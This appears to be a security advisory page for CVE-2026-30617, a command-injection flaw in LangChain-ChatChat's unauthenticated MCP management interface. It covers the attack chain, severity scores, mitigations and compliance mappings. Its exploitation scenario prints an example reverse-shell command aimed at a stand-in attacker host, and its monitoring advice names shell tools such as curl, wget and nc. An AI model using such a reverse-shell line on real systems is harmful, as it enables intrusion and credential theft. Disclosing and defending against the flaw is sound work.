CVE-2026-30617: RCE via unauthenticated MCP interface

CISO Take

LangChain-ChatChat 0.3.1 exposes an unauthenticated MCP management interface that lets any remote attacker plant arbitrary OS commands into the server configuration. When an AI agent subsequently executes with MCP enabled, those commands run in the service context — no user interaction, no credentials needed. The vulnerability aligns with the broader MCP supply chain attack surface documented by Ox Security across the AI ecosystem, signaling a systemic pattern rather than an isolated bug. There is no public exploit or CISA KEV entry as of publication, but the zero-auth exploitation path and prevalence of internet-exposed LangChain-ChatChat deployments in enterprise AI environments warrant immediate action. Restrict the MCP management interface to localhost or trusted networks now, and upgrade when a patched release is available.

Sources: NVD ATLAS ox.security

What is the risk?

HIGH risk despite missing CVSS data. The combination of a publicly exposed, unauthenticated management interface with direct command execution via AI agent tool invocation creates a trivial-to-exploit, maximum-impact vector. The MCP STDIO attack pattern is novel — it abuses the AI agent execution pathway rather than traditional application vulnerabilities — meaning existing WAFs and IDS signatures are unlikely to detect exploitation. AI deployments with internet-accessible LangChain-ChatChat instances are critically exposed. Internal-only deployments face lower but non-zero risk from insider threat and lateral movement scenarios.

How does the attack unfold?

Initial Access

Attacker discovers and accesses the publicly exposed, unauthenticated MCP management interface in LangChain-ChatChat with no credentials required.

AML.T0049

Configuration Tampering

Attacker registers a malicious MCP STDIO server entry containing attacker-controlled OS commands and arguments via the unauthenticated management API.

AML.T0081

Triggered Execution

A legitimate user triggers an AI agent task with MCP enabled; the malicious STDIO configuration fires automatically, executing the attacker's commands on the server.

AML.T0053

Impact

Attacker achieves persistent arbitrary command execution within the LangChain-ChatChat service context, establishing a reverse shell and enabling full host compromise, credential theft, and lateral movement.

AML.T0072

Initial Access

Attacker discovers and accesses the publicly exposed, unauthenticated MCP management interface in LangChain-ChatChat with no credentials required.

AML.T0049

Configuration Tampering

Attacker registers a malicious MCP STDIO server entry containing attacker-controlled OS commands and arguments via the unauthenticated management API.

AML.T0081

Triggered Execution

A legitimate user triggers an AI agent task with MCP enabled; the malicious STDIO configuration fires automatically, executing the attacker's commands on the server.

AML.T0053

Impact

Attacker achieves persistent arbitrary command execution within the LangChain-ChatChat service context, establishing a reverse shell and enabling full host compromise, credential theft, and lateral movement.

AML.T0072

How severe is it?

CVSS 3.1

8.6 / 10

EPSS

0.5%

chance of exploitation in 30 days

Higher than 37% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

No known exploitation

Sophistication

Trivial

What is the attack surface?

AV Network

AC Low

PR None

UI None

S Unchanged

C Low

I Low

A High

What should I do?

6 steps

IMMEDIATE

Firewall or ACL the MCP management interface to localhost or VPN-only — do not expose it to the public internet under any circumstances.
Audit whether MCP is actually required for your deployment; disable it at the application level if not.
Review existing MCP STDIO server configurations for unexpected commands, binaries, or arguments.
Monitor process tree of the LangChain-ChatChat service for anomalous child processes (bash, sh, curl, wget, nc, python spawned from the service).
Upgrade to a patched version as soon as one is released upstream.
Apply container-level seccomp or AppArmor profiles to limit OS-level blast radius from any command execution.

What does CISA's SSVC say?

Decision Track

Exploitation none

Automatable Yes

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Auth Bypass Supply Chain Agent Framework Plugin AML.T0010.005 - AI Agent Tool AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell AML.T0081 - Modify AI Agent Configuration

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

A.8.2 - Information security in AI system development A.9.3 - AI system monitoring and logging

NIST AI RMF

GOVERN 6.2 - Policies and procedures for AI risk management are in place MANAGE 2.4 - Residual risks from AI systems are managed

OWASP LLM Top 10

LLM03:2025 - Supply Chain LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-30617?

LangChain-ChatChat 0.3.1 exposes an unauthenticated MCP management interface that lets any remote attacker plant arbitrary OS commands into the server configuration. When an AI agent subsequently executes with MCP enabled, those commands run in the service context — no user interaction, no credentials needed. The vulnerability aligns with the broader MCP supply chain attack surface documented by Ox Security across the AI ecosystem, signaling a systemic pattern rather than an isolated bug. There is no public exploit or CISA KEV entry as of publication, but the zero-auth exploitation path and prevalence of internet-exposed LangChain-ChatChat deployments in enterprise AI environments warrant immediate action. Restrict the MCP management interface to localhost or trusted networks now, and upgrade when a patched release is available.

Is CVE-2026-30617 actively exploited?

No confirmed active exploitation of CVE-2026-30617 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-30617?

1. IMMEDIATE: Firewall or ACL the MCP management interface to localhost or VPN-only — do not expose it to the public internet under any circumstances. 2. Audit whether MCP is actually required for your deployment; disable it at the application level if not. 3. Review existing MCP STDIO server configurations for unexpected commands, binaries, or arguments. 4. Monitor process tree of the LangChain-ChatChat service for anomalous child processes (bash, sh, curl, wget, nc, python spawned from the service). 5. Upgrade to a patched version as soon as one is released upstream. 6. Apply container-level seccomp or AppArmor profiles to limit OS-level blast radius from any command execution.

What systems are affected by CVE-2026-30617?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM orchestration layers, MCP-enabled AI pipelines, multi-tool AI agents, RAG pipelines.

What is the CVSS score for CVE-2026-30617?

CVE-2026-30617 has a CVSS v3.1 base score of 8.6 (HIGH). The EPSS exploitation probability is 0.47%.

What is the AI security impact?

Affected AI Architectures

agent frameworksLLM orchestration layersMCP-enabled AI pipelinesmulti-tool AI agentsRAG pipelines

MITRE ATLAS Techniques

AML.T0010.005 AI Agent Tool

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0053 AI Agent Tool Invocation

AML.T0072 Reverse Shell

AML.T0081 Modify AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15, Article 9

ISO 42001: A.8.2, A.9.3

NIST AI RMF: GOVERN 6.2, MANAGE 2.4

OWASP LLM Top 10: LLM03:2025, LLM06:2025

What are the technical details?

Original Advisory

LangChain-ChatChat 0.3.1 contains a remote code execution vulnerability in its MCP STDIO server configuration and execution handling. A remote attacker can access the publicly exposed MCP management interface and configure an MCP STDIO server with attacker-controlled commands and arguments. When the MCP server is started and MCP is enabled for agent execution, subsequent agent activity triggers execution of arbitrary commands on the server. Successful exploitation allows arbitrary command execution within the context of the LangChain-ChatChat service.

Exploitation Scenario

An attacker scans for internet-facing LangChain-ChatChat instances and identifies the exposed MCP management endpoint. Without credentials, they POST a crafted payload to register a new MCP STDIO server entry pointing to a reverse shell command (e.g., bash -i >& /dev/tcp/attacker.com/4444 0>&1). The configuration persists server-side. When any legitimate user subsequently triggers an AI agent task with MCP enabled, the registered STDIO command fires in the server context, establishing a persistent reverse shell. The attacker exfiltrates database credentials, reads AI model configurations and API keys, and pivots to connected infrastructure — all triggered passively by normal user activity.

Weaknesses (CWE)

CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')

CWE-77 — Improper Neutralization of Special Elements used in a Command ('Command Injection'): The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.

[Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
[Implementation] If possible, ensure that all external commands called from the program are statically created.

Source: MITRE CWE corpus.